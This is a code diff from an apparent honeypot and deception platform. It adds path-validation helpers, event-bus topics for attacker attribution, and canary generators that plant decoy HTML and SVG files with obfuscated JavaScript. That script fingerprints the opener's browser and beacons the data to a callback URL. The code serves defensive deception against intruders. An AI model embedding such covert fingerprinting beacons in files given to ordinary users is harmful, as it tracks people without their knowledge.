+        raise ArtifactPathError("invalid stored_as")
+
+    root = ARTIFACTS_ROOT.resolve()
+    candidate = (root / decky / service / stored_as).resolve()
+    # defence-in-depth: even though the regexes reject `..`, make sure a
+    # symlink or weird filesystem state can't escape the root.
+    if root not in candidate.parents and candidate != root:
+        raise ArtifactPathError("path escapes artifacts root")
+    return candidate
--- a/decnet/artifacts/shards.py
+++ b/decnet/artifacts/shards.py
@@ -0,0 +1,129 @@
+"""Shared asciinema shard helpers.
+
+Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
+so non-router callers (the BEHAVE-SHELL session-ended handler in
+``decnet/profiler/worker.py``, the collector's session aggregator)
+can resolve shard paths without crossing the layer boundary into the
+FastAPI router.
+
+Functions here speak in :class:`ValueError` — callers that want HTTP
+semantics translate at the boundary. The router wrappers keep their
+existing ``HTTPException`` behaviour for backwards compatibility.
+
+PII boundary unchanged: shards live on disk; this module returns
+:class:`pathlib.Path` pointers, never byte content. The ``_get_index``
+cache stores byte offsets only.
+"""
+from __future__ import annotations
+
+import os
+import re
+from collections import OrderedDict
+from pathlib import Path
+
+ARTIFACTS_ROOT = Path(
+    os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
+)
+
+_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
+_SERVICE_RE = re.compile(r"^(ssh|telnet)$")
+_SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
+_SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
+
+# (path, mtime_ns) → {sid: [(offset, length), ...]}
+_INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
+    OrderedDict()
+)
+_CACHE_MAX = 32
+
+
+def validate_names(decky: str, service: str) -> None:
+    """Raise :class:`ValueError` if ``decky`` / ``service`` look forged."""
+    if not _DECKY_RE.fullmatch(decky):
+        raise ValueError(f"invalid decky name: {decky!r}")
+    if not _SERVICE_RE.fullmatch(service):
+        raise ValueError(f"invalid service: {service!r}")
+
+
+def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
+    """Resolve ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``
+    with escape-attempt detection. Raises :class:`ValueError` on
+    invalid inputs.
+    """
+    validate_names(decky, service)
+    if not _SHARD_BASENAME_RE.fullmatch(shard_name):
+        raise ValueError(f"invalid shard name: {shard_name!r}")
+    root = ARTIFACTS_ROOT.resolve()
+    candidate = (root / decky / service / "transcripts" / shard_name).resolve()
+    if root not in candidate.parents and candidate != root:
+        raise ValueError(f"path escapes artifacts root: {candidate}")
+    return candidate
+
+
+def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
+    index: dict[str, list[tuple[int, int]]] = {}
+    with path.open("rb") as f:
+        offset = 0
+        for line in f:
+            length = len(line)
+            m = _SID_LINE_RE.search(line)
+            if m:
+                sid = m.group(1).decode("ascii")
+                index.setdefault(sid, []).append((offset, length))
+            offset += length
+    return index
+
+
+def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
+    """Return ``(sid → [(offset, length), …], file_size)``.
+
+    Cached by ``(path, mtime_ns)``; rebuilt when the shard changes.
+    """
+    st = path.stat()
+    key = (str(path), st.st_mtime_ns)
+    if key in _INDEX_CACHE:
+        _INDEX_CACHE.move_to_end(key)
+        return _INDEX_CACHE[key], st.st_size
+    index = _build_index(path)
+    _INDEX_CACHE[key] = index
+    _INDEX_CACHE.move_to_end(key)
+    while len(_INDEX_CACHE) > _CACHE_MAX:
+        _INDEX_CACHE.popitem(last=False)
+    return index, st.st_size
+
+
+def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
+    """Scan every ``sessions-YYYY-MM-DD.jsonl`` under the decky's
+    transcripts dir until one claims this ``sid``.
+
+    Newest shards first — most lookups are for recent sessions. Caches
+    the per-shard sid index, so repeated calls are ~free until the
+    shard's mtime changes.
+
+    Returns ``None`` when nothing claims the sid OR when the
+    transcripts dir is missing / unreadable. Never raises on
+    filesystem-level errors — callers treat ``None`` as "skip".
+    """
+    validate_names(decky, service)
+    root = ARTIFACTS_ROOT.resolve()
+    transcripts_dir = (root / decky / service / "transcripts").resolve()
+    if root not in transcripts_dir.parents:
+        return None
+    try:
+        if not transcripts_dir.is_dir():
+            return None
+        entries = list(transcripts_dir.iterdir())
+    except (OSError, PermissionError):
+        return None
+    shards = sorted(
+        (p for p in entries if _SHARD_BASENAME_RE.fullmatch(p.name)),
+        reverse=True,
+    )
+    for shard in shards:
+        try:
+            index, _size = get_index(shard)
+        except (OSError, PermissionError):
+            continue
+        if sid in index:
+            return shard
+    return None
--- a/decnet/asn/iptoasn/provider.py
+++ b/decnet/asn/iptoasn/provider.py
@@ -13,7 +13,7 @@ from typing import Sequence
 from decnet.asn.base import Provider
 from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
 from decnet.asn.iptoasn.parse import parse_file
-from decnet.asn.lookup import AsnLookup
+from decnet.asn.lookup import AsnLookup, Range
 from decnet.asn.paths import ensure_root

 logger = logging.getLogger("decnet.asn.iptoasn.provider")
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
                    "asn.iptoasn: cache load failed, rebuilding: %s", exc
                )

-        ranges = []
+        ranges: list[Range] = []
        for path in self.data_paths():
            if not path.exists():
                continue
--- a/decnet/bus/factory.py
+++ b/decnet/bus/factory.py
@@ -76,7 +76,7 @@ def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
    up at all we no-op.
    """
    try:
-        from decnet.telemetry import wrap_repository  # type: ignore[attr-defined]
+        from decnet.telemetry import wrap_repository
    except ImportError:
        return bus
    try:
--- a/decnet/bus/publish.py
+++ b/decnet/bus/publish.py
@@ -58,7 +58,7 @@ def make_thread_safe_publisher(
    contract the rest of this module already upholds.
    """
    if bus is None:
-        return lambda _topic, _payload, _event_type="": None
+        return lambda _topic, _payload, _event_type="": None  # type: ignore[misc]

    def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
        # Stream threads may keep draining after the bus owner closed it
--- a/decnet/bus/topics.py
+++ b/decnet/bus/topics.py
@@ -17,6 +17,7 @@ Token structure (NATS-style, dot-separated):
    attacker.scored
    attacker.session.started
    attacker.session.ended
+    attacker.observation.{primitive}
    identity.formed
    identity.observation.linked
    identity.merged
@@ -28,12 +29,18 @@ Token structure (NATS-style, dot-separated):
    campaign.unmerged
    credential.captured
    credential.reuse.detected
+    attribution.profile.state_changed
+    attribution.profile.multi_actor_suspected
    canary.{token_id}.triggered
    canary.{token_id}.placed
    canary.{token_id}.revoked
    system.log
    system.bus.health
    system.{worker}.health
+    email.received
+    ttp.tagged
+    ttp.rule.fired.{technique_id}
+    ttp.rule.suppressed

 Wildcards (per :func:`decnet.bus.base.matches`):

@@ -52,8 +59,12 @@ IDENTITY = "identity"
 CAMPAIGN = "campaign"
 SYSTEM = "system"
 CREDENTIAL = "credential"
+ATTRIBUTION = "attribution"
 ORCHESTRATOR = "orchestrator"
 CANARY = "canary"
+SMTP = "smtp"
+EMAIL = "email"
+TTP = "ttp"


 # ─── Leaf event-type constants (the last segment of each topic) ──────────────
@@ -83,6 +94,19 @@ DECKY_MUTATE_REQUEST = "mutate_request"
 # syslog sidechannel too) to interleave substrate-change markers into
 # attacker traversals.
 DECKY_MUTATION = "mutation"
+# Per-service add/remove on a deployed decky (live; no full redeploy).
+# Payload carries ``decky_name``, ``service_name``, optional
+# ``topology_id``, and ``services`` (the post-mutation list).  Consumers
+# that watch substrate shape (correlator, dashboard, profiler) reconcile
+# off these without waiting for the next decnet-state.json snapshot.
+DECKY_SERVICE_ADDED = "service_added"
+DECKY_SERVICE_REMOVED = "service_removed"
+# Per-service config change (the schema-driven Inspector form).  Payload
+# carries ``decky_name``, ``service_name``, optional ``topology_id``,
+# ``service_config`` (the new validated dict), and ``recreated`` — true
+# when the operator hit Apply (container was force-recreated to pick up
+# the new env), false when they only hit Save (DB-only).
+DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"

 # Attacker event types (second token under the ``attacker`` root).  First
 # sighting, session boundary transitions, and score-threshold crossings
@@ -94,6 +118,14 @@ ATTACKER_SCORED = "scored"
 # Distinct from ``observed`` which is the correlator's first-sight signal —
 # a fingerprint is additional evidence about an already-observed attacker.
 ATTACKER_FINGERPRINTED = "fingerprinted"
+# Published when the prober observes a NEW hash for an
+# (attacker_ip, port, probe_type) triple it has seen before — i.e. the
+# attacker rotated their VPS, rebuilt their SSH server, swapped their
+# TLS cert.  Distinct from ``fingerprinted`` which fires on every probe
+# result; ``fingerprint_rotated`` fires only on diff and carries both
+# old_hash + new_hash.  Producer: prober (via the rotation library);
+# consumers: dashboard, forensics, attribution clustering.
+ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
 ATTACKER_SESSION_STARTED = "session.started"
 ATTACKER_SESSION_ENDED = "session.ended"
 # Published by the ``decnet enrich`` worker after an enrichment pass
@@ -101,6 +133,19 @@ ATTACKER_SESSION_ENDED = "session.ended"
 # returned a verdict).  Payload carries the aggregate verdict + per-
 # provider summary so SIEM-bound webhooks don't need to re-query the DB.
 ATTACKER_INTEL_ENRICHED = "intel.enriched"
+# Per-primitive BEHAVE-SHELL observation. Full topic shape:
+#   attacker.observation.<primitive>
+# e.g. ``attacker.observation.motor.input_modality``.  Producer:
+# ``decnet/profiler/behave_shell/`` (extractor library called from the
+# profiler worker on ``attacker.session.ended``); consumers: dashboard
+# SSE relay, attribution engine state machine, federation gossip
+# (post-v0).  See development/BEHAVE-INTEGRATION.md §"Bus topics" for
+# the wire-format contract — the prefix is documentation + pattern
+# match only; bus auth is socket file perms (DEBT-029 §2), not
+# topic-level.  The ``primitive`` segment MAY contain dots
+# (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
+# rule that ``attacker.session.ended`` uses.
+ATTACKER_OBSERVATION_PREFIX = "observation"

 # Identity-resolution event types (second/third tokens under ``identity``).
 # Published by the (future) clusterer worker — see
@@ -168,6 +213,42 @@ CAMPAIGN_UNMERGED = "unmerged"
 CREDENTIAL_CAPTURED = "captured"
 CREDENTIAL_REUSE_DETECTED = "reuse.detected"

+# Attribution-engine event types (second/third tokens under
+# ``attribution``).  Published by the v0 attribution worker
+# (``decnet.correlation.attribution_worker``) which subscribes to
+# ``attacker.observation.>`` and runs the per-(identity, primitive)
+# state machine.  See ``development/ATTRIBUTION-ENGINE.md``.
+#
+#   attribution.profile.state_changed         — per-primitive state
+#                                               transition (e.g.
+#                                               stable → drifting).
+#                                               Payload: identity_uuid,
+#                                               primitive, old_state,
+#                                               new_state, current_value,
+#                                               confidence,
+#                                               observation_count, ts.
+#   attribution.profile.multi_actor_suspected — fires when ≥ 2
+#                                               primitives flag the same
+#                                               identity as multi_actor
+#                                               concurrently. Cross-
+#                                               primitive correlator;
+#                                               single-primitive
+#                                               multi_actor is too noisy
+#                                               on its own. Payload:
+#                                               identity_uuid, primitives,
+#                                               evidence_summary,
+#                                               confidence, ts.
+#
+# These are *derived* signals — distinct from
+# ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
+# ``attacker.observation.*`` (raw extractor envelopes,
+# BEHAVE-INTEGRATION.md). The three families compose: observations feed
+# the attribution engine, the engine emits derived state, the clusterer
+# reads observations + state to form / merge identities.
+ATTRIBUTION_PROFILE_PREFIX = "profile"
+ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
+ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
+
 # Canary-token event types (third token under ``canary``).
 #
 #   canary.{token_id}.placed     — orchestrator/API successfully planted a
@@ -231,6 +312,43 @@ WORKER_CONTROL_START = "start"
 # of patterns. Payload is currently empty; consumers only need the signal.
 WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"

+# Email-receipt event — fired by smtp / smtp-relay services on full-message
+# receipt (envelope + headers + body + attachments captured). Single-token
+# leaf so the bus tokenizer accepts it directly under the ``email`` root.
+# Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
+# rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
+# counts, header names, and rcpt-domain sets — never rcpt addresses or body
+# bytes.
+EMAIL_RECEIVED = "received"
+
+# TTP-tagging event types (second/third tokens under ``ttp``).
+#
+#   ttp.tagged                     — one or more new tags written. Published
+#                                    only when ``INSERT OR IGNORE`` wrote at
+#                                    least one new row; idempotent
+#                                    re-evaluations publish nothing
+#                                    (loop-prevention invariant — see
+#                                    TTP_TAGGING.md).
+#   ttp.rule.fired.{technique_id}  — per-technique fan-out for SIEM
+#                                    consumers that subscribe to a single
+#                                    technique. Topic key is the parent
+#                                    technique; sub_technique is in the
+#                                    payload. Built via :func:`ttp_rule_fired`.
+#   ttp.rule.suppressed            — rule fired but the tag was dropped
+#                                    (confidence below floor, rate-limited,
+#                                    or the rule's RuleState was disabled).
+#                                    Observability signal for the dashboard.
+#
+# Per-rule reload + state-change topics. Built via
+# :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
+# subscribe to ``ttp.rule.reloaded.>`` (every rule) or
+# ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
+TTP_TAGGED = "tagged"
+TTP_RULE_FIRED = "rule.fired"
+TTP_RULE_SUPPRESSED = "rule.suppressed"
+TTP_RULE_RELOADED = "rule.reloaded"
+TTP_RULE_STATE = "rule.state"
+

 # ─── Builders ────────────────────────────────────────────────────────────────

@@ -301,6 +419,42 @@ def attacker(event_type: str) -> str:
    return f"{ATTACKER}.{event_type}"


+def attacker_observation(primitive: str) -> str:
+    """Build ``attacker.observation.<primitive>``.
+
+    *primitive* is the fully-qualified BEHAVE-SHELL primitive path
+    (e.g. ``motor.input_modality``,
+    ``cognitive.feedback_loop_engagement``,
+    ``motor.shell_mastery.tab_completion``).  Dotted primitives are
+    permitted — this matches the format
+    ``behave_shell.spec.event_adapter.event_topic_for`` produces
+    upstream, and DECNET's bus admits the dotted leaf the same way
+    :func:`attacker` does for ``session.started``.
+
+    Empty string is rejected so a downstream typo doesn't ship as
+    ``attacker.observation.``.
+    """
+    if not primitive:
+        raise ValueError(
+            "attacker_observation topic requires a non-empty primitive",
+        )
+    return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
+
+
+def attribution(event_type: str) -> str:
+    """Build ``attribution.<event_type>``.
+
+    *event_type* is typically one of
+    :data:`ATTRIBUTION_PROFILE_STATE_CHANGED` or
+    :data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED` — both contain a
+    dot (``profile.state_changed``) which is permitted under the same
+    "trailing dotted leaf" rule that ``attacker.session.started`` uses.
+    """
+    if not event_type:
+        raise ValueError("attribution topic requires a non-empty event_type")
+    return f"{ATTRIBUTION}.{event_type}"
+
+
 def campaign(event_type: str) -> str:
    """Build ``campaign.<event_type>``.

@@ -381,6 +535,86 @@ def system_control(worker: str) -> str:
    return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"


+def smtp(event_type: str) -> str:
+    """Build ``smtp.<event_type>``.
+
+    *event_type* may contain dots (e.g. ``probe.pending``).
+    """
+    if not event_type:
+        raise ValueError("smtp topic requires a non-empty event_type")
+    return f"{SMTP}.{event_type}"
+
+
+def email_topic(event_type: str) -> str:
+    """Build ``email.<event_type>``.
+
+    Named ``email_topic`` rather than ``email`` to avoid shadowing the
+    Python ``email`` stdlib package at import sites that pull both.
+    *event_type* is typically :data:`EMAIL_RECEIVED`.
+    """
+    if not event_type:
+        raise ValueError("email topic requires a non-empty event_type")
+    return f"{EMAIL}.{event_type}"
+
+
+def ttp(event_type: str) -> str:
+    """Build ``ttp.<event_type>``.
+
+    *event_type* is typically one of :data:`TTP_TAGGED`,
+    :data:`TTP_RULE_FIRED`, or :data:`TTP_RULE_SUPPRESSED`. Dotted
+    leaves (``rule.fired``) are permitted — same rationale as
+    :func:`system`. For per-technique fan-out use
+    :func:`ttp_rule_fired`.
+    """
+    if not event_type:
+        raise ValueError("ttp topic requires a non-empty event_type")
+    return f"{TTP}.{event_type}"
+
+
+def ttp_rule_fired(technique_id: str) -> str:
+    """Build ``ttp.rule.fired.<technique_id>``.
+
+    Per-technique fan-out: SIEM subscribers can listen on
+    ``ttp.rule.fired.>`` for everything, ``ttp.rule.fired.T1110`` for
+    one technique. *technique_id* is validated as a single segment —
+    sub-techniques like ``T1110.001`` are rejected because they would
+    split into two tokens. The topic key is the parent technique;
+    ``sub_technique_id`` lives in the payload.
+    """
+    _reject_tokens(technique_id)
+    return f"{TTP}.{TTP_RULE_FIRED}.{technique_id}"
+
+
+def ttp_rule_reloaded(rule_id: str) -> str:
+    """Build ``ttp.rule.reloaded.<rule_id>``.
+
+    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
+    when a rule's *definition* changes (YAML edit on the filesystem
+    backend, ``ttp_rule`` row update on the database backend). One event
+    per per-rule edit — never batched (the "incremental, never batched"
+    property in TTP_TAGGING.md §"Bus topics" inherits its granularity
+    from :meth:`RuleStore.subscribe_changes`).
+
+    Subscribers: ``ttp.rule.reloaded.>`` for every rule,
+    ``ttp.rule.reloaded.R0001`` for one. *rule_id* is validated as a
+    single segment.
+    """
+    _reject_tokens(rule_id)
+    return f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
+
+
+def ttp_rule_state(rule_id: str) -> str:
+    """Build ``ttp.rule.state.<rule_id>``.
+
+    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
+    when a rule's *operational state* changes (operator hits the disable
+    button, an ``expires_at`` TTL fires and auto-reverts the state).
+    *rule_id* is validated as a single segment.
+    """
+    _reject_tokens(rule_id)
+    return f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
+
+
 def _reject_tokens(*parts: str) -> None:
    """Reject topic segments that would break NATS-style tokenization.

--- a/decnet/canary/_obfuscate_helper.js
+++ b/decnet/canary/_obfuscate_helper.js
@@ -0,0 +1,18 @@
+// Node helper invoked by decnet.canary.obfuscator.
+// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
+// Kept dependency-light on purpose: only javascript-obfuscator.
+const JsObf = require('javascript-obfuscator');
+
+let raw = '';
+process.stdin.setEncoding('utf8');
+process.stdin.on('data', (chunk) => { raw += chunk; });
+process.stdin.on('end', () => {
+  try {
+    const { code, options } = JSON.parse(raw);
+    const result = JsObf.obfuscate(code, options || {});
+    process.stdout.write(result.getObfuscatedCode());
+  } catch (e) {
+    process.stderr.write(String(e && e.stack || e));
+    process.exitCode = 2; // not process.exit(): lets the stderr write flush before exit
+  }
+});
--- a/decnet/canary/base.py
+++ b/decnet/canary/base.py
@@ -100,6 +100,12 @@ class CanaryArtifact:
    planting.  Never leaked to the attacker-facing surface.
    """

+    fingerprint_nonce: Optional[str] = None
+    """Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
+    else.  Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
+    so the worker can validate incoming ``?k=`` params.
+    """
+

 class CanaryGenerator(ABC):
    """Produces a fake artifact from scratch."""
--- a/decnet/canary/cultivator.py
+++ b/decnet/canary/cultivator.py
@@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
    ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
    ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
    ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
+    ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
+    ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
 }


@@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = {
    "honeydoc_pdf": "http",
    "ssh_key": "dns",             # trip is DNS resolution of host comment
    "mysql_dump": "dns",          # trip is DNS resolution of subdomain
+    "fingerprint_html": "http",   # obfuscated JS beacons GET /c/<slug>
+    "fingerprint_svg": "http",    # same, embedded inside SVG <script>
 }


@@ -78,6 +82,8 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
    ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
    ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
    ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
+    ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
+    ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
 }


@@ -136,10 +142,12 @@ async def cultivate(
        )

    callback_token = _new_callback_token()
+    http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
+    dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
    ctx = CanaryContext(
        callback_token=callback_token,
-        http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""),
-        dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""),
+        http_base=http_base_str,
+        dns_zone=dns_zone_str,
        persona="linux",  # all our deckies are POSIX in MVP
    )
    generator = get_generator(gen_name)
@@ -154,7 +162,7 @@ async def cultivate(
    # attribute a callback if the artifact trips during the plant
    # itself (improbable but possible — DOCX viewers can preview
    # autoplay-style).
-    await repo.create_canary_token({
+    token_data: dict = {
        "kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
        "decky_name": plan.decky_name,
        "instrumenter": None,
@@ -165,7 +173,10 @@ async def cultivate(
        "placed_at": datetime.now(timezone.utc),
        "created_by": created_by,
        "state": "planted",
-    })
+    }
+    if artifact.fingerprint_nonce is not None:
+        token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
+    await repo.create_canary_token(token_data)

    # Carry the placement_path on the artifact so the orchestrator's
    # plant_file call uses it.  We don't mutate the generator's
--- a/decnet/canary/dns_server.py
+++ b/decnet/canary/dns_server.py
@@ -131,7 +131,7 @@ def _build_response(
    question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)

    answer = b""
-    if an_count:
+    if an_count and answer_ip is not None:
        # Use a name pointer back to the question (offset 12).
        ptr = struct.pack("!H", 0xC000 | 12)
        rdata = bytes(int(o) for o in answer_ip.split("."))
@@ -169,10 +169,10 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
        self._answer_ip = answer_ip
        self._transport: Optional[asyncio.DatagramTransport] = None

-    def connection_made(self, transport) -> None:  # type: ignore[override]
-        self._transport = transport  # type: ignore[assignment]
+    def connection_made(self, transport) -> None:
+        self._transport = transport

-    def datagram_received(  # type: ignore[override]
+    def datagram_received(
        self, data: bytes, addr: Tuple[str, int],
    ) -> None:
        try:
@@ -190,7 +190,7 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
            return
        # Known name — answer with our sinkhole IP, then fire the hook.
        self._send(addr, _build_response(query, answer_ip=self._answer_ip))
-        asyncio.create_task(self._hook(slug, query, addr[0]))
+        asyncio.ensure_future(self._hook(slug, query, addr[0]))

    def _slug_for(self, qname: str) -> Optional[str]:
        if not self._zone or not qname.endswith(self._suffix):
--- a/decnet/canary/factory.py
+++ b/decnet/canary/factory.py
@@ -21,6 +21,8 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
    "honeydoc_docx",
    "honeydoc_pdf",
    "mysql_dump",
+    "fingerprint_html",
+    "fingerprint_svg",
 )

 KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
@@ -64,6 +66,16 @@ def get_generator(name: str) -> CanaryGenerator:
    if name == "mysql_dump":
        from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
        return MySQLDumpGenerator()
+    if name == "fingerprint_html":
+        from decnet.canary.generators.fingerprint_html import (
+            FingerprintHtmlGenerator,
+        )
+        return FingerprintHtmlGenerator()
+    if name == "fingerprint_svg":
+        from decnet.canary.generators.fingerprint_svg import (
+            FingerprintSvgGenerator,
+        )
+        return FingerprintSvgGenerator()
    raise ValueError(
        f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
    )
--- a/decnet/canary/fingerprint_payload.js
+++ b/decnet/canary/fingerprint_payload.js
@@ -0,0 +1,291 @@
+// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
+// canary, harvests browser primitives, and beacons the result back to the
+// canary worker.  Ported from canary-self-test.html with the rendering UI
+// stripped out.
+//
+// Three placeholders are substituted by the Python builder BEFORE
+// javascript-obfuscator runs:
+//
+//   {{BEACON_URL}}  → full URL to /c/<callback_token> (no trailing slash)
+//   {{MINT_UUID}}   → per-mint UUID, baked into the string-array post-obf
+//   {{MINT_NONCE}}  → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
+//
+// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
+// then a fingerprint payload sent as a base64-URL query param on a second
+// GET so the existing worker records the hit even before step-4 POST
+// support lands.  Both fail-open: any error short-circuits to next step.
+
+(async function () {
+  var BEACON_URL = "{{BEACON_URL}}";
+  var MINT_UUID = "{{MINT_UUID}}";
+  var MINT_NONCE = "{{MINT_NONCE}}";
+  var fp = { mint: MINT_UUID };
+
+  function fire(url) {
+    try {
+      var img = new Image();
+      img.src = url;
+    } catch (e) { /* swallow */ }
+  }
+
+  // 1) bare-open beacon — fires regardless of whether the rest succeeds
+  fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
+
+  function sha256(str) {
+    var buf = new TextEncoder().encode(str);
+    return crypto.subtle.digest("SHA-256", buf).then(function (h) {
+      return Array.from(new Uint8Array(h))
+        .map(function (b) { return b.toString(16).padStart(2, "0"); })
+        .join("");
+    });
+  }
+
+  // navigator
+  try {
+    fp.nav = {
+      ua: navigator.userAgent,
+      pl: navigator.platform,
+      lg: navigator.language,
+      lgs: (navigator.languages || []).join(","),
+      ck: navigator.cookieEnabled,
+      dnt: navigator.doNotTrack,
+      hc: navigator.hardwareConcurrency,
+      dm: navigator.deviceMemory || null,
+      tp: navigator.maxTouchPoints,
+      wd: navigator.webdriver === true,
+      pdf: navigator.pdfViewerEnabled || null,
+    };
+  } catch (e) { fp.nav = { err: String(e) }; }
+
+  // screen
+  try {
+    fp.scr = {
+      w: screen.width, h: screen.height,
+      aw: screen.availWidth, ah: screen.availHeight,
+      cd: screen.colorDepth, pd: screen.pixelDepth,
+      dpr: window.devicePixelRatio,
+      iw: window.innerWidth, ih: window.innerHeight,
+      or: (screen.orientation && screen.orientation.type) || null,
+    };
+  } catch (e) { fp.scr = { err: String(e) }; }
+
+  // tz / locale
+  try {
+    var dtf = Intl.DateTimeFormat().resolvedOptions();
+    fp.tz = {
+      z: dtf.timeZone, lc: dtf.locale,
+      ca: dtf.calendar, ns: dtf.numberingSystem,
+      off: new Date().getTimezoneOffset(),
+    };
+  } catch (e) { fp.tz = { err: String(e) }; }
+
+  // connection
+  try {
+    var c = navigator.connection;
+    fp.cn = c ? {
+      t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
+    } : null;
+  } catch (e) { fp.cn = { err: String(e) }; }
+
+  // canvas
+  try {
+    var cv = document.createElement("canvas");
+    cv.width = 280; cv.height = 60;
+    var ctx = cv.getContext("2d");
+    ctx.textBaseline = "top";
+    ctx.font = "14px Arial";
+    ctx.fillStyle = "#f60";
+    ctx.fillRect(125, 1, 62, 20);
+    ctx.fillStyle = "#069";
+    ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
+    ctx.fillStyle = "rgba(102,204,0,0.7)";
+    ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
+    var dataURL = cv.toDataURL();
+    fp.cv = { h: await sha256(dataURL), n: dataURL.length };
+  } catch (e) { fp.cv = { err: String(e) }; }
+
+  // webgl
+  try {
+    var gc = document.createElement("canvas");
+    var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
+    if (gl) {
+      var ext = gl.getExtension("WEBGL_debug_renderer_info");
+      fp.gl = {
+        v: gl.getParameter(gl.VENDOR),
+        r: gl.getParameter(gl.RENDERER),
+        ver: gl.getParameter(gl.VERSION),
+        sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
+        uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
+        ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
+      };
+    } else { fp.gl = { err: "unavailable" }; }
+  } catch (e) { fp.gl = { err: String(e) }; }
+
+  // audio
+  try {
+    var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
+    if (ACtx) {
+      var actx = new ACtx(1, 44100, 44100);
+      var osc = actx.createOscillator();
+      var cmp = actx.createDynamicsCompressor();
+      osc.type = "triangle"; osc.frequency.value = 10000;
+      cmp.threshold.value = -50; cmp.knee.value = 40;
+      cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
+      osc.connect(cmp); cmp.connect(actx.destination);
+      osc.start(0);
+      var buf = await actx.startRendering();
+      var data = buf.getChannelData(0).slice(4500, 5000);
+      var sum = 0;
+      for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
+      fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
+    } else { fp.au = { err: "unavailable" }; }
+  } catch (e) { fp.au = { err: String(e) }; }
+
+  // fonts
+  try {
+    var bases = ["monospace", "sans-serif", "serif"];
+    var tests = [
+      "Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
+      "Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
+      "Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
+      "JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
